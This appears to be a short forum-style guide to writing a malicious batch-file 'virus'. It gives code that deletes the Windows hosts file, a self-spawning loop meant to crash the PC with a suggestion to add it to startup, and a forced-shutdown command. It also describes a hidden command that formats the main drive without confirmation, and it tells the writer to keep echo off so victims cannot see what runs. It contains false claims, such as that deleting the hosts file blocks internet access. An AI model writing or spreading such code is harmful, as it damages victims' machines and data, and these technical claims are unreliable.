Epic Batch Guide 1.0
Lets start with simplistic, say you want to to make your virus (of sorts) display a message, you would do that with echo.
Simple enough; now you need to follow that up with some commands for doing stuff. Make sure echo is off.
Put that as the first line in your batch file. This makes it so that they (the people running the file) cannot see what the batch file is doing.
Now Some Commands.
1) Block Internet Access
Code:
cd WINDOWS\SYSTEM32\DRIVERS\ETC
attrib hosts -r -h
del hosts
That deletes the files that are necessary for you to access the internet.
(Also, make sure echo is OFF, or else it show that the file is deleting stuff)
2) Hidden Command (HiCM)
This command is lesser know, because it is indeed not documented. What this does is format the main drive without asking for confirmation from the user. Make sure echo is off so it does not show the formatting process.
3) Unending Loop
Code:
@echo off
:loop
start ****.bat
goto loop
You change out **** with the name of your batch file, what this does is continually open and open and open the batch file slowing your PC down until it dies, you must have a fast computer, 4 gigs of ram or more to defend against this attack. For extra lulz make it copy into system startup.
Protip: You may want to use remarks, so you can go back and edit them later, knowing what you put them there for.
Code:
rem THIS IS A REMARK, BASICALLY A COMMENT IN THE CODE.
4) Shutdown force
Code:
shutdown -r -t 10 -c ""
In between the quotations is where you want to put the shutdown message, it can be anything at all.
/Guide